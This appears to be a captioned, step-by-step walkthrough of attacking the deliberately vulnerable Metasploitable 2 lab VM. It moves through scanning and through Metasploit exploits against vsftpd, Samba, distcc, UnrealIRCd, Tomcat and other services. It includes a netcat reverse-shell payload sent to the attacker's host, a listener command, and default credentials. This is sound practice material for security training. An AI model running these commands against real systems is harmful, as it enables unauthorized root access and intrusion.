Description: This screenshot shows the VulnHub (and Rapid7) page for Metasploitable 2, a deliberately vulnerable Linux virtual machine used for security testing and practice.
Author: Metasploit
Date release: 12 Jun 2012
Here, we can see the VirtualBox (or VMware) settings for the Metasploitable 2 virtual machine, including memory, network adapters, and other configuration details before powering it on.
After starting the VM, Metasploitable 2 displays its boot sequence and ASCII banner. The default login credentials (msfadmin:msfadmin) are shown in the welcome message.
Using netdiscover to identify live hosts on the local network. The scan reveals the IP address of the Metasploitable 2 VM (192.168.164.130 in this example).
Running Nmap on the Metasploitable 2 IP address shows multiple open ports and services (FTP, SSH, Telnet, SMTP, etc.). This confirms the system is intentionally exposed for testing various exploits.
Using nmap --script vuln to detect known vulnerabilities. Nmap identifies the vsftpd 2.3.4 backdoor vulnerability, indicating a potential remote root exploit.
A quick Google search for “vsftpd 2.3.4 exploit github” yields multiple public repositories containing proof-of-concept code and scripts for exploiting the vsftpd backdoor.
An example of a Python exploit script on GitHub that targets vsftpd 2.3.4. The repository provides usage instructions and explains how the backdoor was introduced into the service.
Here is the raw Python code for the vsftpd 2.3.4 exploit. It demonstrates how the backdoor is triggered and allows remote code execution.
Executing the exploit against Metasploitable 2 at 192.168.164.130:21. The result shows we’ve successfully gained a root shell (uid=0(root) gid=0(root)), confirming that the vsftpd backdoor was exploited successfully.
This screenshot displays a Reverse Shell Cheat Sheet resource (e.g., from Pentestmonkey). It lists various commands in different languages (Bash, Python, PHP, Ruby, Netcat, etc.) to obtain a reverse shell on a target machine.
Here, the vsftpd-exploit.py script is executed with a custom payload: nc -e /bin/sh 192.168.164.128 1234. This forces Metasploitable 2 to open a reverse shell back to our attacking machine on port 1234.
We start a Netcat (nc) listener on port 1234 using sudo nc -lvnp 1234. The shell connection from the Metasploitable 2 VM successfully connects, giving us a remote root shell (uid=0(root) gid=0(root)).
An Nmap scan (nmap -p22) is performed against Metasploitable 2, confirming that OpenSSH 4.7p1 is running. This helps us identify potential SSH-related vulnerabilities or default credentials.
In Metasploit, we use search ssh_login to locate relevant modules. The auxiliary/scanner/ssh/ssh_login module appears, which can be used to brute-force or test known SSH credentials.
Another view of the Metasploitable 2 login prompt, reminding users never to expose this vulnerable VM on an untrusted network. The default credentials are once again displayed: msfadmin:msfadmin.
This screenshot shows the ssh_login module options in Metasploit. Various parameters can be configured, such as RHOSTS (target IP), RPORT (SSH port), USER_FILE, PASS_FILE, and more.
After running the ssh_login auxiliary module, we obtain valid SSH credentials. Metasploit automatically opens sessions for each successful login, granting shell access to Metasploitable 2.
An Nmap scan against port 23 shows that Telnet is open on the Metasploitable 2 machine. The scan results confirm the OS as Linux and suggest another potential attack vector.
Using search telnet_login in Metasploit, we discover the auxiliary/scanner/telnet/telnet_login module. This module can brute-force or test known credentials against Telnet services.
After running the auxiliary/scanner/telnet/telnet_login module, we successfully log in to Metasploitable 2 via Telnet using the default credentials (msfadmin:msfadmin). We gain a command shell, confirming that Telnet is open and vulnerable to simple credential attacks.
An Nmap scan (nmap --script=ssl-poodle -p25) checks for potential SSL/TLS vulnerabilities on port 25. The output references OpenSSL details and indicates whether the service is vulnerable to attacks like POODLE or other SSL-based exploits.
Here, Metasploit is launched, and we use search smtp_enum to find modules for enumerating SMTP services. This is useful for discovering valid email accounts or usernames via VRFY/EXPN commands.
The auxiliary/scanner/smtp/smtp_enum module is selected, and its options are displayed. We can set parameters like RHOSTS, RPORT, and user/password lists to attempt user enumeration on the SMTP service.
Using Netcat to manually interact with the SMTP service on port 25. Commands like VRFY ftp, VRFY mysql, and others help confirm whether certain users exist on the Metasploitable 2 system.
An Nmap scan (nmap -A -p80) is run against the Metasploitable 2 host to identify the web server. The result shows Apache 2.2.8 (Ubuntu) DAV/2 and additional OS details.
In Metasploit, search http_version locates the auxiliary/scanner/http/http_version module. This module can help identify the exact HTTP server version, which is useful for targeting known vulnerabilities.
Visiting the target’s web server reveals a PHP info page showing PHP 5.2.4-2ubuntu5.10. This information is crucial for pinpointing exploits that target specific PHP versions.
Using search php_cgi in Metasploit locates the php_cgi_arg_injection exploit. This vulnerability allows remote code execution by injecting arguments into the PHP CGI interface.
After setting the RHOSTS to 192.168.164.130 and exploiting the php_cgi_arg_injection module, we obtain a Meterpreter session with full shell access. We confirm the target OS, user privileges, and can now pivot to further post-exploitation steps.
Using Nmap with the smb-os-discovery script (nmap -p 139,445 --script smb-os-discovery 192.168.164.130) to gather SMB information about the Metasploitable 2 host. It reveals OS details, NetBIOS name, domain, and system time.
We query the target using nblookup (or similar commands) and then use smbclient with an anonymous login (-N) to list available shares. The results show default shares like ADMIN$, IPC$, and other exposed resources on the Metasploitable 2 system.
Running enum4linux (enum4linux -v 192.168.164.130) to gather more detailed SMB and NetBIOS information. This includes domain/workgroup names, session checks, and SIDs for the Metasploitable 2 host.
In Metasploit, we use search samba usermap to locate the exploit/multi/samba/usermap_script module. This is a known vulnerability (CVE-2007-2447) that can lead to remote code execution on certain Samba versions.
After configuring and running the usermap_script exploit (exploit/multi/samba/usermap_script), we successfully gain a remote shell with root privileges (uid=0(root) gid=0(root)), demonstrating a classic Samba vulnerability on Metasploitable 2.
An Nmap scan against ports 512, 513, and 514 (nmap -A -p 512,513,514 192.168.164.130) checks for rsh, rexec, and rlogin services. These legacy “R-services” can be insecure if misconfigured.
Demonstrating rlogin (rlogin -l root 192.168.164.130) to the Metasploitable 2 machine, resulting in direct root access without additional authentication prompts. This highlights how dangerous R-services can be if left unsecured.
Here, we run Nmap (nmap -A -p1099 192.168.164.130) to detect a Java RMI service listening on port 1099. The scan output indicates a GNU Classpath grmiregistry, suggesting potential vulnerabilities in RMI configurations.
Within Metasploit, using search java_rmi finds modules like exploit/multi/misc/java_rmi_server. This module targets insecure RMI registry configurations that allow remote code execution.
By setting RHOSTS to 192.168.164.130 and running the java_rmi_server exploit, we successfully obtain a Meterpreter session on Metasploitable 2. The shell output confirms system details, user privileges, and directory listings.
Using Nmap with -A -p1524 against Metasploitable 2, we discover a bind shell service labeled as “bindshell Metasploitable root shell.” This indicates an open backdoor on port 1524 that could grant direct root access.
By using Netcat (nc 192.168.164.130 1524), we connect to the bind shell and immediately gain a root shell on Metasploitable 2. The directory listing (ls -la) confirms our elevated privileges.
An Nmap scan (nmap --script=vuln -A -p3306) checks for known MySQL vulnerabilities on Metasploitable 2. The output references potential CVEs (e.g., CVE-2012-2122, CVE-2016-6662), indicating insecure MySQL configurations that can be exploited.
Here, we attempt to log into the MySQL service as root (e.g., mysql -h 192.168.164.130 -u root). We list available databases (like dvwa, owasp10, userdb) and discover tables, including user credentials. Notably, default or weak passwords are often found in Metasploitable 2.
Using Nmap with --script=vuln -A -p3632, we detect a DistCC Daemon running on Metasploitable 2. The results indicate a known vulnerability (CVE-2004-2687) that allows remote command execution.
In Metasploit, we run search distcc to locate the exploit/unix/misc/distcc_exec module. This module exploits the DistCC service by sending malicious commands that the server executes remotely.
After configuring the distcc_exec exploit and selecting a suitable payload, we successfully gain a remote shell as the daemon user on Metasploitable 2. We confirm our privileges with commands like id and uname -a.
An Nmap scan (nmap --script=vuln -A -p5432) identifies PostgreSQL 8.3.7 running on Metasploitable 2. The output also notes potential SSL vulnerabilities (like POODLE or CCS injection) if SSL is enabled on the service.
Within Metasploit, we use search postgresql to discover a range of PostgreSQL-related modules. These include auxiliary scanners (for enumeration) and exploits (for privilege escalation or remote code execution) targeting PostgreSQL services.
Here, we select the exploit/linux/postgres/postgres_payload module in Metasploit and configure the necessary options (e.g., RHOSTS, RPORT, LHOST, LPORT). This module attempts to gain a remote shell by injecting and executing malicious code through the PostgreSQL service.
After configuring and running the postgres_payload exploit (exploit/linux/postgres/postgres_payload), we successfully obtain a Meterpreter session on the Metasploitable 2 host. System information confirms we’re running on an i686 architecture with Linux kernel 2.6.x.
We run Nmap with --script=vuln -A -p5900 to probe the VNC service on Metasploitable 2. The output indicates that VNC (Virtual Network Computing) is open, which could allow remote desktop connections if not properly secured.
Using search vnc_login in Metasploit locates auxiliary/scanner/vnc/vnc_login, a module for brute forcing or testing default credentials against a VNC service. This can reveal weak or no-password configurations.
We connect to the Metasploitable 2 machine via VNC (e.g., vncviewer 192.168.164.130). The screenshot shows a remote desktop session, indicating default or weak authentication is enabled.
Here, we run nmap --script=vuln -A -p6667 and discover an UnrealIRCd service. The scan references a known backdoor vulnerability (e.g., CVE-2010-2075) that allows remote command execution if the service is unpatched.
In Metasploit, search unreal_ircd locates the exploit/unix/irc/unreal_ircd_3281_backdoor module. This is a known exploit that leverages the backdoor introduced in certain UnrealIRCd versions.
After setting the RHOSTS, RPORT, and choosing a payload, we exploit UnrealIRCd and gain a remote shell. The shell output (id, directory listings) confirms root-level access on the Metasploitable 2 host.
Using Nmap with --script=vuln -A -p8180, we detect Apache Tomcat/Servlet JSP Engine 1.1. This indicates a Tomcat instance running on an alternate port (8180) that might be vulnerable to known exploits or misconfigurations.
We run search apache_tomcat in Metasploit, finding multiple modules related to Tomcat exploitation, such as remote code execution via tomcat_mgr_deploy, credential brute force, or weak default credentials.
Using exploit/multi/http/tomcat_mgr_deploy in Metasploit, we deploy a Java/Metasploit payload through the Tomcat Manager application. Once successful, a Meterpreter session is opened, granting remote access to the Metasploitable 2 system. System commands confirm the session is running with the postgres user privileges (or other specified user).
